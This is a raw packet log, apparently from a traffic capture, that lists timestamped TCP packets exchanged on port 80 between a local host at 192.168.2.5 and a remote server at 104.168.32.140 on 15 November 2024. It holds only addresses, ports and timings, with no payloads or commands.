                                                                    Nov 15, 2024 17:21:04.455164909 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455173969 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455205917 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455230951 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455346107 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455363035 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455387115 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455399036 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455404043 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455420971 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455425978 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455436945 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455466032 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455495119 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455512047 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455526114 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455540895 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455547094 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455557108 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455575943 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455586910 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455806971 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455822945 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455840111 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455847979 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455876112 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455883980 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455899954 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.455915928 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455950975 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455975056 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.455996990 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456046104 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456060886 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456083059 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456091881 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456116915 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456166029 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456182003 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456191063 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456322908 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456340075 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456356049 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456370115 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456383944 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456399918 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456422091 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456458092 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456465960 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456481934 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456499100 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456515074 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456537962 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456553936 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456568956 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456583977 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456598997 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456608057 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456614017 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456630945 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456640959 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456648111 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456665039 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456670046 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456697941 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456721067 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.456923008 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456938982 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456954002 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.456968069 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457015991 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.457607031 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457633018 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457648039 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457657099 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.457684994 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.457745075 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457760096 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457776070 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457792044 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457807064 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.457808018 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457820892 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.457824945 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.457844019 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.457879066 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.573509932 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573525906 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573540926 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573595047 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573620081 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573621035 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.573636055 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573652983 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573668003 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573668003 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.573694944 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.573707104 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573724031 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.573748112 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.573748112 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573772907 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573790073 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573791027 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.573806047 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.573810101 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.573831081 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.573852062 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574038029 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574052095 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574068069 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574081898 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574084997 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574093103 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574107885 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574110985 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574126959 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574129105 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574146986 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574173927 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574377060 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574393988 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574419975 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574423075 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574429989 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574462891 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574516058 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574532986 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574548006 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574553013 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574573040 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574594021 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574801922 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574846983 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574881077 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574894905 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574909925 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.574914932 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574933052 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.574958086 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575001955 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575017929 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575033903 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575038910 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575057030 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575077057 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575083971 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575099945 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575115919 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575124979 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575138092 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575159073 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575387001 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575403929 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575419903 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575423002 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575433969 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575444937 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575448990 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575455904 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575464964 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575469971 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575483084 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575500011 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575500965 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575506926 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575515985 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575524092 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575531960 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575547934 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575562954 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575575113 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575690985 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575706959 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575722933 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575731039 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575741053 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575747013 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575758934 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575764894 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575776100 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575781107 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575802088 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575814962 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.575846910 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575862885 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.575902939 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.576016903 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.576034069 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.576050043 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.576056957 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.576066017 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.576081991 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.576082945 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.576100111 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.576107025 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.576128006 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.576158047 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.577176094 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577193022 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577208042 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577224970 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577228069 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.577240944 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577255964 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577263117 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.577271938 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577285051 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.577318907 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.577358961 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577374935 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577392101 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577402115 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.577408075 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.577429056 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.577435970 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.577461004 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.618652105 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.618668079 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.618683100 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.618737936 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.618777037 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.692631006 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692647934 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692662001 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692692995 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.692732096 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.692781925 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692796946 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692821026 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.692821026 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692836046 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692846060 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.692852020 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692859888 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.692867041 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692881107 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.692882061 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692899942 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.692914963 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.692958117 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692972898 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692986965 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.692996025 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693001986 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693082094 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693082094 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693118095 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693133116 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693149090 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693157911 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693165064 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693170071 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693186998 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693207026 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693273067 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693315029 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693459988 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693496943 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693589926 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693604946 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693619967 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693629026 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693635941 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693639994 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693665981 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693675041 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693778038 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693803072 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693815947 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693833113 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693844080 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693846941 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.693888903 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.693888903 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694125891 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694142103 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694156885 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694164991 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694170952 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694180965 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694201946 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694211960 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694402933 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694417953 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694433928 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694438934 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694448948 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694457054 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694464922 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694474936 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694493055 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694508076 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694515944 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694524050 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694540977 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694545984 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694561005 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694581985 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694717884 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694732904 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694746971 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694753885 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694765091 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694771051 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694781065 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694787979 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694797039 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694803953 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694819927 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694842100 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694938898 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694953918 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.694974899 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.694991112 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695013046 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695051908 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695207119 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695221901 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695236921 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695245028 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695269108 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695280075 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695280075 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695295095 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695310116 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695316076 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695329905 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695360899 CET4992880192.168.2.5104.168.32.140
                                                                    Nov 15, 2024 17:21:04.695396900 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695411921 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695425987 CET8049928104.168.32.140192.168.2.5
                                                                    Nov 15, 2024 17:21:04.695434093 CET4992880192.168.2.5104.168.32.140
